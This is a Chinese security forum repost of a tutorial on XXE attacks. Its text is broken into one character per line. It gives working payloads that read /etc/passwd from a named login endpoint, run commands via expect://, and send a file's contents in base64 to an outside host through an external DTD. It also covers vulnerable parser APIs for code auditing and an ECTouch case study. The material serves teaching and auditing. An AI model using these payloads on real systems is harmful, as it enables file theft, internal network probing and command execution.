论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
Web安全
[2053] 2021-01-27_一次“实战”引起的XXE学习
文档创建者:
s7ckTeam
浏览次数:
7
最后更新:
2025-01-16
Web安全
7 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2021-01-27_一次“实战”引起的XXE学习
一
次
“
实
战
”
引
起
的
X
X
E
学
习
原
创
d
o
n
9
d
o
n
9
s
e
c
2
0
2
1
-
0
1
-
2
7
收
录
于
话
题
#
经
验
总
结
,
7
个
啊
这
?
似
乎
又
是
n
d
a
y
的
节
奏
。
如
图
:
p
a
y
l
o
a
d
:
_
_
t
y
p
e
=
u
p
d
a
t
e
D
a
t
a
&
_
_
v
i
e
w
I
n
s
t
a
n
c
e
I
d
=
n
c
.
b
s
.
h
r
s
s
.
l
o
g
i
n
.
L
o
g
i
n
~
n
c
.
b
s
.
h
r
s
s
.
l
o
g
i
n
.
L
o
g
i
n
V
i
e
w
M
o
d
e
l
&
_
_
x
m
l
=
<
!
D
O
C
T
Y
P
E
A
N
Y
[
<
!
E
N
T
I
T
Y
x
x
e
S
Y
S
T
E
M
"
/
e
t
c
/
p
a
s
s
w
d
"
>
]
>
<
r
p
c
m
e
t
h
o
d
=
"
n
o
t
e
I
n
p
u
t
C
o
u
n
t
"
>
<
p
s
>
<
p
n
a
m
e
=
"
u
s
e
r
_
c
o
d
e
"
>
1
<
/
p
>
<
/
p
s
>
<
v
p
s
>
<
p
n
a
m
e
=
"
D
E
F
A
U
L
T
_
D
A
T
A
_
S
O
U
R
C
E
"
>
%
2
6
x
x
e
;
<
/
p
>
<
/
v
p
s
>
<
/
r
p
c
>
毫
无
参
与
感
,
为
了
凑
字
数
,
只
好
趁
这
篇
文
章
记
录
记
录
x
x
e
的
知
识
点
。
x
x
e
可
用
的
协
议
可
用
的
协
议
#
目
标
站
:
h
t
t
p
:
/
/
1
.
1
.
1
.
1
:
6
6
6
6
/
h
r
s
s
/
l
o
g
i
n
.
j
s
p
x
x
e
攻
击
面
攻
击
面
文
件
读
取
-
有
回
显
(
N
o
r
m
a
l
X
X
E
)
结
合
外
部
实
体
声
明
(
实
体
名
称
S
Y
S
T
E
M
”
u
r
i
/
u
r
l
“
)
和
参
数
实
体
(
%
实
体
名
称
S
Y
S
T
E
M
“
u
r
i
-
外
部
d
t
d
”
)
有
两
种
方
式
进
行
注
入
攻
击
文
件
读
取
-
无
回
显
(
B
l
i
n
d
O
O
B
X
X
E
)
S
S
R
F
有
回
显
无
回
显
-
盲
打
H
T
T
P
内
网
主
机
探
测
内
网
主
机
端
口
(
服
务
)
探
测
#
可
以
先
获
取
目
标
的
大
致
主
机
i
p
分
配
/
e
t
c
/
n
e
t
w
o
r
k
/
i
n
t
e
r
f
a
c
e
s
/
p
r
o
c
/
n
e
t
/
a
r
p
/
e
t
c
/
h
o
s
t
s
.
.
.
.
.
例
/
e
t
c
/
h
o
s
t
s
:
开
始
探
测
#
当
主
机
不
存
在
或
不
可
达
时
回
显
:
<
e
r
r
o
r
M
e
s
s
a
g
e
>
N
o
r
o
u
t
e
t
o
h
o
s
t
<
/
e
r
r
o
r
M
e
s
s
a
g
e
>
<
e
r
r
o
r
M
e
s
s
a
g
e
>
N
e
t
w
o
r
k
i
s
u
n
r
e
a
c
h
a
b
l
e
<
/
e
r
r
o
r
M
e
s
s
a
g
e
>
连
续
调
用
三
个
参
数
实
体
%
r
e
m
o
t
e
;
%
i
n
t
;
%
s
e
n
d
,
其
调
用
顺
序
如
下
:
%
r
e
m
o
t
e
先
调
用
,
调
用
后
请
求
远
程
服
务
器
上
的
e
v
i
l
.
d
t
d
类
似
于
将
e
v
i
l
.
d
t
d
包
含
进
来
,
然
后
%
i
n
t
调
用
e
v
i
l
.
d
t
d
中
的
%
f
i
l
e
%
f
i
l
e
就
会
去
获
取
服
务
器
上
面
的
敏
感
文
件
然
后
将
%
f
i
l
e
的
结
果
填
入
到
%
s
e
n
d
以
后
,
再
调
用
%
s
e
n
d
把
读
取
到
的
数
据
发
送
到
远
程
v
p
s
上
,
这
样
就
实
现
了
外
带
#
当
主
机
存
在
时
回
显
:
<
e
r
r
o
r
M
e
s
s
a
g
e
>
C
o
n
n
e
c
t
i
o
n
r
e
f
u
s
e
d
<
/
e
r
r
o
r
M
e
s
s
a
g
e
>
p
h
p
+
e
x
p
e
r
t
:
/
/
(
千
年
等
一
回
)
代
码
执
行
P
H
P
e
x
p
e
c
t
模
块
被
加
载
到
存
在
x
x
e
漏
洞
应
用
程
序
上
,
可
用
以
下
姿
势
执
行
命
令
:
代
码
审
计
中
的
代
码
审
计
中
的
x
x
e
X
M
L
解
析
一
般
在
数
据
传
输
等
场
景
可
能
会
遇
到
,
所
以
只
要
遇
到
涉
及
到
X
M
L
文
件
处
理
的
场
景
都
可
以
留
意
X
M
L
解
析
器
是
否
已
经
禁
用
外
部
实
体
。
常
见
漏
洞
触
发
点
如
下
:
J
a
v
a
D
o
c
u
m
e
n
t
H
e
l
p
e
r
.
p
a
r
s
e
T
e
x
t
D
o
c
u
m
e
n
t
B
u
i
l
d
e
r
j
a
v
a
x
.
x
m
l
.
p
a
r
s
e
r
s
.
D
o
c
u
m
e
n
t
B
u
i
l
d
e
r
F
a
c
t
o
r
y
;
j
a
v
a
x
.
x
m
l
.
p
a
r
s
e
r
s
.
S
A
X
P
a
r
s
e
r
j
a
v
a
x
.
x
m
l
.
t
r
a
n
s
f
o
r
m
.
T
r
a
n
s
f
o
r
m
e
r
F
a
c
t
o
r
y
j
a
v
a
x
.
x
m
l
.
v
a
l
i
d
a
t
i
o
n
.
V
a
l
i
d
a
t
o
r
j
a
v
a
x
.
x
m
l
.
v
a
l
i
d
a
t
i
o
n
.
S
c
h
e
m
a
F
a
c
t
o
r
y
j
a
v
a
x
.
x
m
l
.
t
r
a
n
s
f
o
r
m
.
s
a
x
.
S
A
X
T
r
a
n
s
f
o
r
m
e
r
F
a
c
t
o
r
y
j
a
v
a
x
.
x
m
l
.
t
r
a
n
s
f
o
r
m
.
s
a
x
.
S
A
X
S
o
u
r
c
e
j
a
v
a
x
.
x
m
l
.
b
i
n
d
.
U
n
m
a
r
s
h
a
l
l
e
r
j
a
v
a
x
.
x
m
l
.
x
p
a
t
h
.
X
p
a
t
h
E
x
p
r
e
s
s
i
o
n
j
a
v
a
x
.
x
m
l
.
s
t
r
e
a
m
.
X
M
L
S
t
r
e
a
m
R
e
a
d
e
r
o
r
g
.
x
m
l
.
s
a
x
.
X
M
L
R
e
a
d
e
r
o
r
g
.
x
m
l
.
s
a
x
.
h
e
l
p
e
r
s
.
X
M
L
R
e
a
d
e
r
F
a
c
t
o
r
y
o
r
g
.
d
o
m
4
j
.
i
o
.
S
A
X
R
e
a
d
e
r
o
r
g
.
j
d
o
m
.
i
n
p
u
t
.
S
A
X
B
u
i
l
d
e
r
o
r
g
.
j
d
o
m
2
.
i
n
p
u
t
.
S
A
X
B
u
i
l
d
e
r
o
r
g
.
a
p
a
c
h
e
.
c
o
m
m
o
n
s
.
d
i
g
e
s
t
e
r
3
.
D
i
g
e
s
t
e
r
r
g
.
x
m
l
.
s
a
x
.
S
A
X
P
a
r
s
e
E
x
c
e
p
t
i
o
n
p
u
b
l
i
c
I
d
.
.
.
.
.
.
<
?
x
m
l
v
e
r
s
i
o
n
=
"
1
.
0
"
?
>
<
!
D
O
C
T
Y
P
E
G
V
I
[
<
!
E
L
E
M
E
N
T
f
o
o
A
N
Y
>
<
!
E
N
T
I
T
Y
x
x
e
S
Y
S
T
E
M
"
e
x
p
e
c
t
:
/
/
i
d
"
>
]
>
<
c
a
t
a
l
o
g
>
<
c
o
r
e
i
d
=
"
d
o
n
9
s
e
c
"
>
<
a
u
t
h
o
r
>
J
o
h
n
,
D
o
e
<
/
a
u
t
h
o
r
>
<
t
i
t
l
e
>
I
l
o
v
e
X
M
L
<
/
t
i
t
l
e
>
<
c
a
t
e
g
o
r
y
>
C
o
m
p
u
t
e
r
s
<
/
c
a
t
e
g
o
r
y
>
<
p
r
i
c
e
>
9
.
9
9
<
/
p
r
i
c
e
>
<
d
a
t
e
>
2
0
1
8
-
1
0
-
0
1
<
/
d
a
t
e
>
<
d
e
s
c
r
i
p
t
i
o
n
>
&
x
x
e
;
<
/
d
e
s
c
r
i
p
t
i
o
n
>
<
/
c
o
r
e
>
<
/
c
a
t
a
l
o
g
>
p
h
p
s
i
m
p
l
e
x
m
l
_
l
o
a
d
_
s
t
r
i
n
g
在
进
行
代
码
审
计
时
,
定
位
关
键
词
,
回
溯
分
析
即
可
。
案
例
分
析
案
例
分
析
-
E
C
T
o
u
c
h
x
x
e
漏
洞
漏
洞
前
提
p
h
p
5
.
3
-
5
.
4
高
版
本
s
i
m
p
l
e
x
m
l
_
l
o
a
d
_
s
t
r
i
n
g
当
第
3
个
参
数
不
为
"
L
I
B
X
M
L
_
N
O
E
N
T
"
参
数
时
不
解
析
x
m
l
定
位
关
键
词
:
s
i
m
p
l
e
x
m
l
_
l
o
a
d
_
s
t
r
i
n
g
(
v
a
l
i
d
函
数
分
析
:
p
o
s
t
的
数
据
传
入
到
p
o
s
t
S
t
r
参
数
中
最
后
进
入
到
s
i
m
p
l
e
x
m
l
_
l
o
a
d
_
s
t
r
i
n
g
中
被
解
析
但
是
并
没
有
回
显
,
只
能
盲
注
再
来
看
一
下
v
a
l
i
d
函
数
的
被
调
用
情
况
:
v
a
l
i
d
(
c
o
n
s
t
r
u
c
t
函
数
分
析
:
#
传
入
参
数
o
r
g
i
d
,
然
后
获
取
w
x
i
n
f
o
#
接
着
实
例
化
W
e
c
h
a
t
类
$
t
h
i
s
-
>
w
e
O
b
j
=
n
e
w
W
e
c
h
a
t
(
$
c
o
n
f
i
g
)
;
#
最
后
调
用
v
a
l
i
d
函
数
$
t
h
i
s
-
>
w
e
O
b
j
-
>
v
a
l
i
d
(
)
;
构
造
路
由
/
i
n
d
e
x
.
p
h
p
?
m
=
d
e
f
a
u
l
t
&
a
=
i
n
d
e
x
&
c
=
w
e
c
h
a
t
&
o
r
g
i
d
=
1
x
x
e
盲
注
通
用
p
a
y
l
o
a
d
:
<
?
x
m
l
v
e
r
s
i
o
n
=
"
1
.
0
"
e
n
c
o
d
i
n
g
=
"
u
t
f
-
8
"
?
>
<
!
D
O
C
T
Y
P
E
d
a
t
a
[
<
!
E
N
T
I
T
Y
%
f
i
l
e
S
Y
S
T
E
M
"
p
h
p
:
/
/
f
i
l
t
e
r
/
r
e
a
d
=
c
o
n
v
e
r
t
.
b
a
s
e
6
4
-
e
n
c
o
d
e
/
r
e
s
o
u
r
c
e
=
f
i
l
e
:
/
/
/
c
:
/
/
w
i
n
d
o
w
s
/
w
i
n
.
i
n
i
"
>
<
!
E
N
T
I
T
Y
%
d
t
d
S
Y
S
T
E
M
"
h
t
t
p
:
/
/
0
.
0
.
0
.
0
/
x
x
e
.
x
m
l
"
>
%
d
t
d
;
%
a
l
l
;
]
>
<
v
a
l
u
e
>
&
s
e
n
d
;
<
/
v
a
l
u
e
>
v
p
s
上
的
x
x
e
.
x
m
l
:
如
图
:
大
概
跑
了
一
下
,
发
现
案
例
还
是
蛮
多
的
:
附
上
几
篇
经
典
的
文
章
(
第
5
篇
不
看
后
悔
)
:
参
考
:
<
!
E
N
T
I
T
Y
%
a
l
l
"
<
!
E
N
T
I
T
Y
s
e
n
d
S
Y
S
T
E
M
'
h
t
t
p
:
/
/
x
x
e
.
c
e
y
e
.
i
o
/
%
f
i
l
e
;
'
>
"
>
1
.
微
信
支
付
J
a
v
a
S
D
K
X
X
E
漏
洞
实
战
浅
析
h
t
t
p
:
/
/
w
w
w
.
n
x
a
d
m
i
n
.
c
o
m
/
w
e
b
/
1
6
8
6
.
h
t
m
l
2
.
E
x
p
l
o
i
t
i
n
g
X
X
E
w
i
t
h
E
x
c
e
l
h
t
t
p
s
:
/
/
w
w
w
.
4
a
r
m
e
d
.
c
o
m
/
b
l
o
g
/
e
x
p
l
o
i
t
i
n
g
-
x
x
e
-
w
i
t
h
-
e
x
c
e
l
/
3
.
X
X
E
t
o
域
控
(
基
于
资
源
的
约
束
委
派
)
h
t
t
p
s
:
/
/
b
l
o
g
.
a
t
e
a
m
.
q
i
a
n
x
i
n
.
c
o
m
/
p
o
s
t
/
z
h
e
-
s
h
i
-
y
i
-
p
i
a
n
-
b
u
-
y
i
-
y
a
n
g
-
d
e
-
z
h
e
n
-
s
h
i
-
s
h
e
n
-
t
o
u
-
c
e
-
s
h
i
-
a
n
-
l
i
-
f
e
n
-
x
i
-
w
e
n
-
z
h
a
n
g
/
#
4
-
x
x
e
-
t
o
-
%
E
5
%
9
F
%
9
F
%
E
6
%
8
E
%
A
7
4
.
E
x
p
l
o
i
t
i
n
g
X
X
E
f
o
r
S
S
R
F
h
t
t
p
s
:
/
/
g
u
p
t
a
-
b
l
e
s
s
.
m
e
d
i
u
m
.
c
o
m
/
e
x
p
l
o
i
t
i
n
g
-
x
x
e
-
f
o
r
-
s
s
r
f
-
c
2
3
8
9
2
3
7
4
c
0
c
5
.
F
r
o
m
b
l
i
n
d
X
X
E
t
o
r
o
o
t
-
l
e
v
e
l
f
i
l
e
r
e
a
d
a
c
c
e
s
s
(
强
烈
推
荐
)
h
t
t
p
s
:
/
/
h
o
n
o
k
i
.
n
e
t
/
2
0
1
8
/
1
2
/
1
2
/
f
r
o
m
-
b
l
i
n
d
-
x
x
e
-
t
o
-
r
o
o
t
-
l
e
v
e
l
-
f
i
l
e
-
r
e
a
d
-
a
c
c
e
s
s
/
h
t
t
p
:
/
/
f
o
r
e
v
e
r
s
o
n
g
.
c
n
/
h
t
t
p
s
:
/
/
w
w
w
.
a
n
q
u
a
n
k
e
.
c
o
m
/
p
o
s
t
/
i
d
/
1
5
1
9
4
4
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
Web安全